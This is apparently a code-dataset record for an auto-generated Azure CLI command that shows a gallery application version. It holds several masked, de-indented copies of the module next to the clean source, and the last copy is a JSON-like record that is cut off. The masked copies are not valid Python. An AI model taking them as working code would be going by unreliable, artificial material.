serialized_name='secureVMDiskEncryptionSetId')
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _handler(self, command_args):
super()._handler(command_args)
self._execute_operations()
return self._output()
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.GalleryApplicationVersionsGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = 'MgmtClient'
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=
False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'
, **self.url_parameters)
@property
def method(self):
return 'GET'
@property
def error_format(self):
return 'ODataV4Format'
@property
def url_parameters(self):
parameters = {**self.serialize_url_param(
'galleryApplicationName', self.ctx.args.
gallery_application_name, required=True), **self.
serialize_url_param('galleryApplicationVersionName', self.
ctx.args.gallery_application_version_name, required=True),
**self.serialize_url_param('galleryName', self.ctx.args.
gallery_name, required=True), **self.serialize_url_param(
'resourceGroupName', self.ctx.args.resource_group, required
=True), **self.serialize_url_param('subscriptionId', self.
ctx.subscription_id, required=True)}
return parameters
@property
def query_parameters(self):
parameters = {**self.serialize_query_param('$expand', self.ctx.
args.expand), **self.serialize_query_param('api-version',
'2022-01-03', required=True)}
return parameters
@property
def header_parameters(self):
parameters = {**self.serialize_header_param('Accept',
'application/json')}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var('instance', data, schema_builder=self.
_build_schema_on_200)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(flags={'read_only': True})
_schema_on_200.location = AAZStrType(flags={'required': True})
_schema_on_200.name = AAZStrType(flags={'read_only': True})
_schema_on_200.properties = AAZObjectType(flags={
'client_flatten': True})
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(flags={'read_only': True})
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(serialized_name=
'provisioningState', flags={'read_only': True})
properties.publishing_profile = AAZObjectType(serialized_name=
'publishingProfile', flags={'required': True})
properties.replication_status = AAZObjectType(serialized_name=
'replicationStatus')
publishing_profile = (cls._schema_on_200.properties.
publishing_profile)
publishing_profile.advanced_settings = AAZDictType(serialized_name
='advancedSettings')
publishing_profile.enable_health_check = AAZBoolType(
serialized_name='enableHealthCheck')
publishing_profile.end_of_life_date = AAZStrType(serialized_name
='endOfLifeDate')
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name='excludeFromLatest')
publishing_profile.manage_actions = AAZObjectType(serialized_name
='manageActions')
publishing_profile.published_date = AAZStrType(serialized_name=
'publishedDate', flags={'read_only': True})
publishing_profile.replica_count = AAZIntType(serialized_name=
'replicaCount')
publishing_profile.replication_mode = AAZStrType(serialized_name
='replicationMode')
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(flags={'required': True})
publishing_profile.storage_account_type = AAZStrType(
serialized_name='storageAccountType')
publishing_profile.target_extended_locations = AAZListType(
serialized_name='targetExtendedLocations')
publishing_profile.target_regions = AAZListType(serialized_name
='targetRegions')
advanced_settings = (cls._schema_on_200.properties.
publishing_profile.advanced_settings)
advanced_settings.Element = AAZStrType()
manage_actions = (cls._schema_on_200.properties.
publishing_profile.manage_actions)
manage_actions.install = AAZStrType(flags={'required': True})
manage_actions.remove = AAZStrType(flags={'required': True})
manage_actions.update = AAZStrType()
settings = (cls._schema_on_200.properties.publishing_profile.
settings)
settings.config_file_name = AAZStrType(serialized_name=
'configFileName')
settings.package_file_name = AAZStrType(serialized_name=
'packageFileName')
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(serialized_name=
'defaultConfigurationLink')
source.media_link = AAZStrType(serialized_name='mediaLink',
flags={'required': True})
target_extended_locations = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations)
target_extended_locations.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_extended_locations.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.extended_location = AAZObjectType(serialized_name=
'extendedLocation')
_element.extended_location_replica_count = AAZIntType(
serialized_name='extendedLocationReplicaCount')
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
extended_location = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations.Element.
extended_location)
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = (cls._schema_on_200.properties.
publishing_profile.target_regions)
target_regions.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_regions.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.name = AAZStrType(flags={'required': True})
_element.regional_replica_count = AAZIntType(serialized_name=
'regionalReplicaCount')
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
replication_status = (cls._schema_on_200.properties.
replication_status)
replication_status.aggregated_state = AAZStrType(serialized_name
='aggregatedState', flags={'read_only': True})
replication_status.summary = AAZListType(flags={'read_only': True})
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.replication_status.
summary.Element)
_element.details = AAZStrType(flags={'read_only': True})
_element.progress = AAZIntType(flags={'read_only': True})
_element.region = AAZStrType(flags={'read_only': True})
_element.state = AAZStrType(flags={'read_only': True})
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_encryption_images_read = None
@classmethod
def _build_schema_encryption_images_read(cls, _schema):
if cls._schema_encryption_images_read is not None:
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
return
(cls._schema_encryption_images_read) = (_schema_encryption_images_read
) = AAZObjectType()
encryption_images_read = _schema_encryption_images_read
encryption_images_read.data_disk_images = AAZListType(serialized_name
='dataDiskImages')
encryption_images_read.os_disk_image = AAZObjectType(serialized_name
='osDiskImage')
data_disk_images = _schema_encryption_images_read.data_disk_images
data_disk_images.Element = AAZObjectType()
_element = _schema_encryption_images_read.data_disk_images.Element
_element.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
_element.lun = AAZIntType(flags={'required': True})
os_disk_image = _schema_encryption_images_read.os_disk_image
os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
os_disk_image.security_profile = AAZObjectType(serialized_name=
'securityProfile')
security_profile = (_schema_encryption_images_read.os_disk_image.
security_profile)
security_profile.confidential_vm_encryption_type = AAZStrType(
serialized_name='confidentialVMEncryptionType')
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
serialized_name='secureVMDiskEncryptionSetId')
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register_command('sig gallery-application version show')
class Show(AAZCommand):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _handler(self, command_args):
super()._handler(command_args)
self._execute_operations()
return self._output()
<|reserved_special_token_0|>
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(options=[
'--application-name', '--gallery-application-name'], help=
'The name of the gallery application.', required=True, id_part=
'child_name_1')
_args_schema.gallery_application_version_name = AAZStrArg(options=[
'-n', '--name', '--version-name',
'--gallery-application-version-name'], help=
'The name of the gallery application version.', required=True,
id_part='child_name_2')
_args_schema.gallery_name = AAZStrArg(options=['-r',
'--gallery-name'], help='Gallery name.', required=True, id_part
='name')
_args_schema.resource_group = AAZResourceGroupNameArg(help=
'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'
, required=True)
_args_schema.expand = AAZStrArg(options=['--expand'], help=
'The expand expression to apply on the operation. "ReplicationStatus" Default value is None.'
, enum={'ReplicationStatus': 'ReplicationStatus'})
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.GalleryApplicationVersionsGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
<|reserved_special_token_0|>
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance,
client_flatten=True)
return result
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = 'MgmtClient'
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=
False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'
, **self.url_parameters)
@property
def method(self):
return 'GET'
@property
def error_format(self):
return 'ODataV4Format'
@property
def url_parameters(self):
parameters = {**self.serialize_url_param(
'galleryApplicationName', self.ctx.args.
gallery_application_name, required=True), **self.
serialize_url_param('galleryApplicationVersionName', self.
ctx.args.gallery_application_version_name, required=True),
**self.serialize_url_param('galleryName', self.ctx.args.
gallery_name, required=True), **self.serialize_url_param(
'resourceGroupName', self.ctx.args.resource_group, required
=True), **self.serialize_url_param('subscriptionId', self.
ctx.subscription_id, required=True)}
return parameters
@property
def query_parameters(self):
parameters = {**self.serialize_query_param('$expand', self.ctx.
args.expand), **self.serialize_query_param('api-version',
'2022-01-03', required=True)}
return parameters
@property
def header_parameters(self):
parameters = {**self.serialize_header_param('Accept',
'application/json')}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var('instance', data, schema_builder=self.
_build_schema_on_200)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(flags={'read_only': True})
_schema_on_200.location = AAZStrType(flags={'required': True})
_schema_on_200.name = AAZStrType(flags={'read_only': True})
_schema_on_200.properties = AAZObjectType(flags={
'client_flatten': True})
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(flags={'read_only': True})
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(serialized_name=
'provisioningState', flags={'read_only': True})
properties.publishing_profile = AAZObjectType(serialized_name=
'publishingProfile', flags={'required': True})
properties.replication_status = AAZObjectType(serialized_name=
'replicationStatus')
publishing_profile = (cls._schema_on_200.properties.
publishing_profile)
publishing_profile.advanced_settings = AAZDictType(serialized_name
='advancedSettings')
publishing_profile.enable_health_check = AAZBoolType(
serialized_name='enableHealthCheck')
publishing_profile.end_of_life_date = AAZStrType(serialized_name
='endOfLifeDate')
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name='excludeFromLatest')
publishing_profile.manage_actions = AAZObjectType(serialized_name
='manageActions')
publishing_profile.published_date = AAZStrType(serialized_name=
'publishedDate', flags={'read_only': True})
publishing_profile.replica_count = AAZIntType(serialized_name=
'replicaCount')
publishing_profile.replication_mode = AAZStrType(serialized_name
='replicationMode')
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(flags={'required': True})
publishing_profile.storage_account_type = AAZStrType(
serialized_name='storageAccountType')
publishing_profile.target_extended_locations = AAZListType(
serialized_name='targetExtendedLocations')
publishing_profile.target_regions = AAZListType(serialized_name
='targetRegions')
advanced_settings = (cls._schema_on_200.properties.
publishing_profile.advanced_settings)
advanced_settings.Element = AAZStrType()
manage_actions = (cls._schema_on_200.properties.
publishing_profile.manage_actions)
manage_actions.install = AAZStrType(flags={'required': True})
manage_actions.remove = AAZStrType(flags={'required': True})
manage_actions.update = AAZStrType()
settings = (cls._schema_on_200.properties.publishing_profile.
settings)
settings.config_file_name = AAZStrType(serialized_name=
'configFileName')
settings.package_file_name = AAZStrType(serialized_name=
'packageFileName')
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(serialized_name=
'defaultConfigurationLink')
source.media_link = AAZStrType(serialized_name='mediaLink',
flags={'required': True})
target_extended_locations = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations)
target_extended_locations.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_extended_locations.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.extended_location = AAZObjectType(serialized_name=
'extendedLocation')
_element.extended_location_replica_count = AAZIntType(
serialized_name='extendedLocationReplicaCount')
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
extended_location = (cls._schema_on_200.properties.
publishing_profile.target_extended_locations.Element.
extended_location)
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = (cls._schema_on_200.properties.
publishing_profile.target_regions)
target_regions.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.publishing_profile.
target_regions.Element)
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.
encryption)
_element.name = AAZStrType(flags={'required': True})
_element.regional_replica_count = AAZIntType(serialized_name=
'regionalReplicaCount')
_element.storage_account_type = AAZStrType(serialized_name=
'storageAccountType')
replication_status = (cls._schema_on_200.properties.
replication_status)
replication_status.aggregated_state = AAZStrType(serialized_name
='aggregatedState', flags={'read_only': True})
replication_status.summary = AAZListType(flags={'read_only': True})
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = (cls._schema_on_200.properties.replication_status.
summary.Element)
_element.details = AAZStrType(flags={'read_only': True})
_element.progress = AAZIntType(flags={'read_only': True})
_element.region = AAZStrType(flags={'read_only': True})
_element.state = AAZStrType(flags={'read_only': True})
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_encryption_images_read = None
@classmethod
def _build_schema_encryption_images_read(cls, _schema):
if cls._schema_encryption_images_read is not None:
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
return
(cls._schema_encryption_images_read) = (_schema_encryption_images_read
) = AAZObjectType()
encryption_images_read = _schema_encryption_images_read
encryption_images_read.data_disk_images = AAZListType(serialized_name
='dataDiskImages')
encryption_images_read.os_disk_image = AAZObjectType(serialized_name
='osDiskImage')
data_disk_images = _schema_encryption_images_read.data_disk_images
data_disk_images.Element = AAZObjectType()
_element = _schema_encryption_images_read.data_disk_images.Element
_element.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
_element.lun = AAZIntType(flags={'required': True})
os_disk_image = _schema_encryption_images_read.os_disk_image
os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=
'diskEncryptionSetId')
os_disk_image.security_profile = AAZObjectType(serialized_name=
'securityProfile')
security_profile = (_schema_encryption_images_read.os_disk_image.
security_profile)
security_profile.confidential_vm_encryption_type = AAZStrType(
serialized_name='confidentialVMEncryptionType')
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
serialized_name='secureVMDiskEncryptionSetId')
_schema.data_disk_images = (cls._schema_encryption_images_read.
data_disk_images)
_schema.os_disk_image = (cls._schema_encryption_images_read.
os_disk_image)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"sig gallery-application version show",
)
class Show(AAZCommand):
"""Get information about a gallery application version.
"""
_aaz_info = {
"version": "2022-01-03",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.compute/galleries/{}/applications/{}/versions/{}", "2022-01-03"],
]
}
def _handler(self, command_args):
super()._handler(command_args)
self._execute_operations()
return self._output()
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.gallery_application_name = AAZStrArg(
options=["--application-name", "--gallery-application-name"],
help="The name of the gallery application.",
required=True,
id_part="child_name_1",
)
_args_schema.gallery_application_version_name = AAZStrArg(
options=["-n", "--name", "--version-name", "--gallery-application-version-name"],
help="The name of the gallery application version.",
required=True,
id_part="child_name_2",
)
_args_schema.gallery_name = AAZStrArg(
options=["-r", "--gallery-name"],
help="Gallery name.",
required=True,
id_part="name",
)
_args_schema.resource_group = AAZResourceGroupNameArg(
help="Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.",
required=True,
)
_args_schema.expand = AAZStrArg(
options=["--expand"],
help="The expand expression to apply on the operation. \"ReplicationStatus\" Default value is None.",
enum={"ReplicationStatus": "ReplicationStatus"},
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.GalleryApplicationVersionsGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class GalleryApplicationVersionsGet(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}",
**self.url_parameters
)
@property
def method(self):
return "GET"
@property
def error_format(self):
return "ODataV4Format"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"galleryApplicationName", self.ctx.args.gallery_application_name,
required=True,
),
**self.serialize_url_param(
"galleryApplicationVersionName", self.ctx.args.gallery_application_version_name,
required=True,
),
**self.serialize_url_param(
"galleryName", self.ctx.args.gallery_name,
required=True,
),
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"$expand", self.ctx.args.expand,
),
**self.serialize_query_param(
"api-version", "2022-01-03",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.id = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.location = AAZStrType(
flags={"required": True},
)
_schema_on_200.name = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.properties = AAZObjectType(
flags={"client_flatten": True},
)
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(
flags={"read_only": True},
)
properties = cls._schema_on_200.properties
properties.provisioning_state = AAZStrType(
serialized_name="provisioningState",
flags={"read_only": True},
)
properties.publishing_profile = AAZObjectType(
serialized_name="publishingProfile",
flags={"required": True},
)
properties.replication_status = AAZObjectType(
serialized_name="replicationStatus",
)
publishing_profile = cls._schema_on_200.properties.publishing_profile
publishing_profile.advanced_settings = AAZDictType(
serialized_name="advancedSettings",
)
publishing_profile.enable_health_check = AAZBoolType(
serialized_name="enableHealthCheck",
)
publishing_profile.end_of_life_date = AAZStrType(
serialized_name="endOfLifeDate",
)
publishing_profile.exclude_from_latest = AAZBoolType(
serialized_name="excludeFromLatest",
)
publishing_profile.manage_actions = AAZObjectType(
serialized_name="manageActions",
)
publishing_profile.published_date = AAZStrType(
serialized_name="publishedDate",
flags={"read_only": True},
)
publishing_profile.replica_count = AAZIntType(
serialized_name="replicaCount",
)
publishing_profile.replication_mode = AAZStrType(
serialized_name="replicationMode",
)
publishing_profile.settings = AAZObjectType()
publishing_profile.source = AAZObjectType(
flags={"required": True},
)
publishing_profile.storage_account_type = AAZStrType(
serialized_name="storageAccountType",
)
publishing_profile.target_extended_locations = AAZListType(
serialized_name="targetExtendedLocations",
)
publishing_profile.target_regions = AAZListType(
serialized_name="targetRegions",
)
advanced_settings = cls._schema_on_200.properties.publishing_profile.advanced_settings
advanced_settings.Element = AAZStrType()
manage_actions = cls._schema_on_200.properties.publishing_profile.manage_actions
manage_actions.install = AAZStrType(
flags={"required": True},
)
manage_actions.remove = AAZStrType(
flags={"required": True},
)
manage_actions.update = AAZStrType()
settings = cls._schema_on_200.properties.publishing_profile.settings
settings.config_file_name = AAZStrType(
serialized_name="configFileName",
)
settings.package_file_name = AAZStrType(
serialized_name="packageFileName",
)
source = cls._schema_on_200.properties.publishing_profile.source
source.default_configuration_link = AAZStrType(
serialized_name="defaultConfigurationLink",
)
source.media_link = AAZStrType(
serialized_name="mediaLink",
flags={"required": True},
)
target_extended_locations = cls._schema_on_200.properties.publishing_profile.target_extended_locations
target_extended_locations.Element = AAZObjectType()
_element = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.encryption)
_element.extended_location = AAZObjectType(
serialized_name="extendedLocation",
)
_element.extended_location_replica_count = AAZIntType(
serialized_name="extendedLocationReplicaCount",
)
_element.name = AAZStrType()
_element.storage_account_type = AAZStrType(
serialized_name="storageAccountType",
)
extended_location = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element.extended_location
extended_location.name = AAZStrType()
extended_location.type = AAZStrType()
target_regions = cls._schema_on_200.properties.publishing_profile.target_regions
target_regions.Element = AAZObjectType()
_element = cls._schema_on_200.properties.publishing_profile.target_regions.Element
_element.encryption = AAZObjectType()
_ShowHelper._build_schema_encryption_images_read(_element.encryption)
_element.name = AAZStrType(
flags={"required": True},
)
_element.regional_replica_count = AAZIntType(
serialized_name="regionalReplicaCount",
)
_element.storage_account_type = AAZStrType(
serialized_name="storageAccountType",
)
replication_status = cls._schema_on_200.properties.replication_status
replication_status.aggregated_state = AAZStrType(
serialized_name="aggregatedState",
flags={"read_only": True},
)
replication_status.summary = AAZListType(
flags={"read_only": True},
)
summary = cls._schema_on_200.properties.replication_status.summary
summary.Element = AAZObjectType()
_element = cls._schema_on_200.properties.replication_status.summary.Element
_element.details = AAZStrType(
flags={"read_only": True},
)
_element.progress = AAZIntType(
flags={"read_only": True},
)
_element.region = AAZStrType(
flags={"read_only": True},
)
_element.state = AAZStrType(
flags={"read_only": True},
)
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_encryption_images_read = None
@classmethod
def _build_schema_encryption_images_read(cls, _schema):
if cls._schema_encryption_images_read is not None:
_schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
_schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
return
cls._schema_encryption_images_read = _schema_encryption_images_read = AAZObjectType()
encryption_images_read = _schema_encryption_images_read
encryption_images_read.data_disk_images = AAZListType(
serialized_name="dataDiskImages",
)
encryption_images_read.os_disk_image = AAZObjectType(
serialized_name="osDiskImage",
)
data_disk_images = _schema_encryption_images_read.data_disk_images
data_disk_images.Element = AAZObjectType()
_element = _schema_encryption_images_read.data_disk_images.Element
_element.disk_encryption_set_id = AAZStrType(
serialized_name="diskEncryptionSetId",
)
_element.lun = AAZIntType(
flags={"required": True},
)
os_disk_image = _schema_encryption_images_read.os_disk_image
os_disk_image.disk_encryption_set_id = AAZStrType(
serialized_name="diskEncryptionSetId",
)
os_disk_image.security_profile = AAZObjectType(
serialized_name="securityProfile",
)
security_profile = _schema_encryption_images_read.os_disk_image.security_profile
security_profile.confidential_vm_encryption_type = AAZStrType(
serialized_name="confidentialVMEncryptionType",
)
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(
serialized_name="secureVMDiskEncryptionSetId",
)
_schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images
_schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image
__all__ = ["Show"]
|
flexible
|
{
"blob_id": "8197d918b86f0e38fb4320434b61aa4186853af9",
"index": 1131,
"step-1": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = 